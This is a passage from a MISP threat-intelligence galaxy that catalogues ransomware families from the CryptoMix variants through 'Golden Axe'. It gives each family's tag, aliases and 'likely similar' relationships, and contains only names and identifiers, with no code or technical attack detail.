  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Tastylock

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Tastylock"

CryptoMix-Tastylock is also known as:

  • Tastylock CryptoMix

CryptoMix-Tastylock has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Test

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Test"

CryptoMix-Test is also known as:

  • Test CryptoMix

CryptoMix-Test has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Wallet

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Wallet"

CryptoMix-Wallet has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

Cryptomix-WORK

Ransomware

The tag is: misp-galaxy:ransomware="Cryptomix-WORK"

Cryptomix-WORK is also known as:

  • WORK CryptoMix

Cryptomix-WORK has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-x1881

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-x1881"

CryptoMix-x1881 is also known as:

  • x1881 CryptoMix

CryptoMix-x1881 has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-XZZX

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-XZZX"

CryptoMix-XZZX is also known as:

  • XZZX CryptoMix

CryptoMix-XZZX has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Zayka

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Zayka"

CryptoMix-Zayka is also known as:

  • Zayka CryptoMix

CryptoMix-Zayka has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

Crypton

Ransomware

The tag is: misp-galaxy:ransomware="Crypton"

CryptoPatronum

Ransomware

The tag is: misp-galaxy:ransomware="CryptoPatronum"

CryptoPokemon

Ransomware

The tag is: misp-galaxy:ransomware="CryptoPokemon"

CryptorBit

Ransomware

The tag is: misp-galaxy:ransomware="CryptorBit"

CryptoShield 2.0

Ransomware

The tag is: misp-galaxy:ransomware="CryptoShield 2.0"

CryptoSpider

Ransomware

The tag is: misp-galaxy:ransomware="CryptoSpider"

CryptoViki

Ransomware

The tag is: misp-galaxy:ransomware="CryptoViki"

Cryptre

Ransomware

The tag is: misp-galaxy:ransomware="Cryptre"

CrypTron

Ransomware

The tag is: misp-galaxy:ransomware="CrypTron"

Crysis XTBL

Ransomware

The tag is: misp-galaxy:ransomware="Crysis XTBL"

Crystal

Ransomware

The tag is: misp-galaxy:ransomware="Crystal"

CrystalCrypt

Ransomware

The tag is: misp-galaxy:ransomware="CrystalCrypt"

CryTekk

Ransomware

The tag is: misp-galaxy:ransomware="CryTekk"

CSP

Ransomware

The tag is: misp-galaxy:ransomware="CSP"

CTB-Locker Original

Ransomware

The tag is: misp-galaxy:ransomware="CTB-Locker Original"

CTF

Ransomware

The tag is: misp-galaxy:ransomware="CTF"

Curumim

Ransomware

The tag is: misp-galaxy:ransomware="Curumim"

CVLocker

Ransomware

The tag is: misp-galaxy:ransomware="CVLocker"

Cyber Police HT

Ransomware

The tag is: misp-galaxy:ransomware="Cyber Police HT"

CyberDrill2

Ransomware

The tag is: misp-galaxy:ransomware="CyberDrill2"

CyberResearcher

Ransomware

The tag is: misp-galaxy:ransomware="CyberResearcher"

CyberSCCP

Ransomware

The tag is: misp-galaxy:ransomware="CyberSCCP"

CyberSoldier

Ransomware

The tag is: misp-galaxy:ransomware="CyberSoldier"

Cyclone

Ransomware

The tag is: misp-galaxy:ransomware="Cyclone"

CypherPy

Ransomware

The tag is: misp-galaxy:ransomware="CypherPy"

Cyspt

Ransomware

The tag is: misp-galaxy:ransomware="Cyspt"

Czech

Ransomware

The tag is: misp-galaxy:ransomware="Czech"

D00mEd

Ransomware

The tag is: misp-galaxy:ransomware="D00mEd"

D2+D

Ransomware

The tag is: misp-galaxy:ransomware="D2+D"

DarkKomet

Ransomware

The tag is: misp-galaxy:ransomware="DarkKomet"

DarkLocker

Ransomware

The tag is: misp-galaxy:ransomware="DarkLocker"

DarkoderCryptor

Ransomware

The tag is: misp-galaxy:ransomware="DarkoderCryptor"

DataKeeper

Ransomware

The tag is: misp-galaxy:ransomware="DataKeeper"

Datebatut

Ransomware

The tag is: misp-galaxy:ransomware="Datebatut"

DCRTR

Ransomware

The tag is: misp-galaxy:ransomware="DCRTR"

DCRTR-WDM

Ransomware

The tag is: misp-galaxy:ransomware="DCRTR-WDM"

DCry

Ransomware

The tag is: misp-galaxy:ransomware="DCry"

DDE

Ransomware

The tag is: misp-galaxy:ransomware="DDE"

DeadSec-Crypto

Ransomware

The tag is: misp-galaxy:ransomware="DeadSec-Crypto"

DeathHiddenTear (Large&Small HT) >

Ransomware

The tag is: misp-galaxy:ransomware="DeathHiddenTear (Large&Small HT) > "

DeathNote

Ransomware

The tag is: misp-galaxy:ransomware="DeathNote"

DeathRansom

Ransomware

The tag is: misp-galaxy:ransomware="DeathRansom"

DecryptIomega

Ransomware

The tag is: misp-galaxy:ransomware="DecryptIomega"

Decryption Assistant

Ransomware

The tag is: misp-galaxy:ransomware="Decryption Assistant"

DecService

Ransomware

The tag is: misp-galaxy:ransomware="DecService"

DecYourData

Ransomware

The tag is: misp-galaxy:ransomware="DecYourData"

Defender

Ransomware

The tag is: misp-galaxy:ransomware="Defender"

Defray (Glushkov)

Ransomware

The tag is: misp-galaxy:ransomware="Defray (Glushkov)"

Deos

Ransomware

The tag is: misp-galaxy:ransomware="Deos"

Desktop

Ransomware

The tag is: misp-galaxy:ransomware="Desktop"

Diamond

Ransomware

The tag is: misp-galaxy:ransomware="Diamond"

DilmaLocker

Ransomware

The tag is: misp-galaxy:ransomware="DilmaLocker"

Dishwasher

Ransomware

The tag is: misp-galaxy:ransomware="Dishwasher"

District

Ransomware

The tag is: misp-galaxy:ransomware="District"

DMA Locker 1.0-2.0-3.0

Ransomware

The tag is: misp-galaxy:ransomware="DMA Locker 1.0-2.0-3.0"

DMA Locker 4.0

Ransomware

The tag is: misp-galaxy:ransomware="DMA Locker 4.0"

DMALocker Imposter

Ransomware

The tag is: misp-galaxy:ransomware="DMALocker Imposter"

Dodger

Ransomware

The tag is: misp-galaxy:ransomware="Dodger"

DolphinTear

Ransomware

The tag is: misp-galaxy:ransomware="DolphinTear"

Donald Trump

Ransomware

The tag is: misp-galaxy:ransomware="Donald Trump"

Donation1

Ransomware

The tag is: misp-galaxy:ransomware="Donation1"

Done

Ransomware

The tag is: misp-galaxy:ransomware="Done"

Dont_Worry

Ransomware

The tag is: misp-galaxy:ransomware="Dont_Worry"

DotNoData

Ransomware

The tag is: misp-galaxy:ransomware="DotNoData"

DotZeroCMD

Ransomware

The tag is: misp-galaxy:ransomware="DotZeroCMD"

Dr. Fucker

Ransomware

The tag is: misp-galaxy:ransomware="Dr. Fucker"

Dr. Jimbo

Ransomware

The tag is: misp-galaxy:ransomware="Dr. Jimbo"

Drakos

Ransomware

The tag is: misp-galaxy:ransomware="Drakos"

DriedSister

Ransomware

The tag is: misp-galaxy:ransomware="DriedSister"

Dviide

Ransomware

The tag is: misp-galaxy:ransomware="Dviide"

eBayWall

Ransomware

The tag is: misp-galaxy:ransomware="eBayWall"

EbolaRnsmwr

Ransomware

The tag is: misp-galaxy:ransomware="EbolaRnsmwr"

ECLR

Ransomware

The tag is: misp-galaxy:ransomware="ECLR"

EggLocker

Ransomware

The tag is: misp-galaxy:ransomware="EggLocker"

Ekati demo tool

Ransomware

The tag is: misp-galaxy:ransomware="Ekati demo tool"

Enc1

Ransomware

The tag is: misp-galaxy:ransomware="Enc1"

EncoderCSL

Ransomware

The tag is: misp-galaxy:ransomware="EncoderCSL"

EnCrypt

Ransomware

The tag is: misp-galaxy:ransomware="EnCrypt"

EncryptedBatch

Ransomware

The tag is: misp-galaxy:ransomware="EncryptedBatch"

EncryptServer2018

Ransomware

The tag is: misp-galaxy:ransomware="EncryptServer2018"

EnybenyCrypt

Ransomware

The tag is: misp-galaxy:ransomware="EnybenyCrypt"

EOEO

Ransomware

The tag is: misp-galaxy:ransomware="EOEO"

Epoblockl

Ransomware

The tag is: misp-galaxy:ransomware="Epoblockl"

Erica2020

Ransomware

The tag is: misp-galaxy:ransomware="Erica2020"

Eris

Ransomware

The tag is: misp-galaxy:ransomware="Eris"

Estemani

Ransomware

The tag is: misp-galaxy:ransomware="Estemani"

Eternal

Ransomware

The tag is: misp-galaxy:ransomware="Eternal"

Eternity

Ransomware

The tag is: misp-galaxy:ransomware="Eternity"

Euclid

Ransomware

The tag is: misp-galaxy:ransomware="Euclid"

Evasive HT

Ransomware

The tag is: misp-galaxy:ransomware="Evasive HT"

Evolution

Ransomware

The tag is: misp-galaxy:ransomware="Evolution"

Executioner

Ransomware

The tag is: misp-galaxy:ransomware="Executioner"

ExecutionerPlus

Ransomware

The tag is: misp-galaxy:ransomware="ExecutionerPlus"

Exocrypt XTC

Ransomware

The tag is: misp-galaxy:ransomware="Exocrypt XTC"

ExoLock

Ransomware

The tag is: misp-galaxy:ransomware="ExoLock"

ExpBoot

Ransomware

The tag is: misp-galaxy:ransomware="ExpBoot"

Explorer

Ransomware

The tag is: misp-galaxy:ransomware="Explorer"

Extortion Scam

Ransomware

The tag is: misp-galaxy:ransomware="Extortion Scam"

Extortion Scam is also known as:

  • Sextortion Scam

Extractor

Ransomware

The tag is: misp-galaxy:ransomware="Extractor"

EyLamo

Ransomware

The tag is: misp-galaxy:ransomware="EyLamo"

EZDZ

Ransomware

The tag is: misp-galaxy:ransomware="EZDZ"

Fabiansomware

Ransomware

The tag is: misp-galaxy:ransomware="Fabiansomware"

Facebook HT

Ransomware

The tag is: misp-galaxy:ransomware="Facebook HT"

Faizal

Ransomware

The tag is: misp-galaxy:ransomware="Faizal"

Fake Cerber

Ransomware

The tag is: misp-galaxy:ransomware="Fake Cerber"

Fake DMA

ransomware

The tag is: misp-galaxy:ransomware="Fake DMA"

FartPlz

ransomware

The tag is: misp-galaxy:ransomware="FartPlz"

FBLocker

ransomware

The tag is: misp-galaxy:ransomware="FBLocker"

FCP

ransomware

The tag is: misp-galaxy:ransomware="FCP"

FCrypt

ransomware

The tag is: misp-galaxy:ransomware="FCrypt"

FCT

ransomware

The tag is: misp-galaxy:ransomware="FCT"

Fenrir

ransomware

The tag is: misp-galaxy:ransomware="Fenrir"

File Ripper

ransomware

The tag is: misp-galaxy:ransomware="File Ripper"

FileFuck

ransomware

The tag is: misp-galaxy:ransomware="FileFuck"

FilesL0cker

ransomware

The tag is: misp-galaxy:ransomware="FilesL0cker"

Final

ransomware

The tag is: misp-galaxy:ransomware="Final"

FindZip

ransomware

The tag is: misp-galaxy:ransomware="FindZip"

Flatcher3

ransomware

The tag is: misp-galaxy:ransomware="Flatcher3"

Fluffy-TAR

ransomware

The tag is: misp-galaxy:ransomware="Fluffy-TAR"

Foxy

ransomware

The tag is: misp-galaxy:ransomware="Foxy"

FreeMe

ransomware

The tag is: misp-galaxy:ransomware="FreeMe"

Freshdesk

ransomware

The tag is: misp-galaxy:ransomware="Freshdesk"

Frog

ransomware

The tag is: misp-galaxy:ransomware="Frog"

FrozrLock

ransomware

The tag is: misp-galaxy:ransomware="FrozrLock"

FRS

ransomware

The tag is: misp-galaxy:ransomware="FRS"

FScrypt

ransomware

The tag is: misp-galaxy:ransomware="FScrypt"

FuckTheSystem

ransomware

The tag is: misp-galaxy:ransomware="FuckTheSystem"

FuxSocy Encryptor

ransomware

The tag is: misp-galaxy:ransomware="FuxSocy Encryptor"

Galacti-Crypter

ransomware

The tag is: misp-galaxy:ransomware="Galacti-Crypter"

GameOver

ransomware

The tag is: misp-galaxy:ransomware="GameOver"

Geminis3

ransomware

The tag is: misp-galaxy:ransomware="Geminis3"

Gendarmerie

ransomware

The tag is: misp-galaxy:ransomware="Gendarmerie"

Genobot

ransomware

The tag is: misp-galaxy:ransomware="Genobot"

GermanWiper

ransomware

The tag is: misp-galaxy:ransomware="GermanWiper"

GhosTEncryptor

ransomware

The tag is: misp-galaxy:ransomware="GhosTEncryptor"

GhostHammer

ransomware

The tag is: misp-galaxy:ransomware="GhostHammer"

Gibberish

ransomware

The tag is: misp-galaxy:ransomware="Gibberish"

Gibon

ransomware

The tag is: misp-galaxy:ransomware="Gibon"

Giyotin

ransomware

The tag is: misp-galaxy:ransomware="Giyotin"

GoCryptoLocker

ransomware

The tag is: misp-galaxy:ransomware="GoCryptoLocker"

Godra

ransomware

The tag is: misp-galaxy:ransomware="Godra"

GoGoogle

ransomware

The tag is: misp-galaxy:ransomware="GoGoogle"

GoHack

ransomware

The tag is: misp-galaxy:ransomware="GoHack"

Golden Axe

ransomware

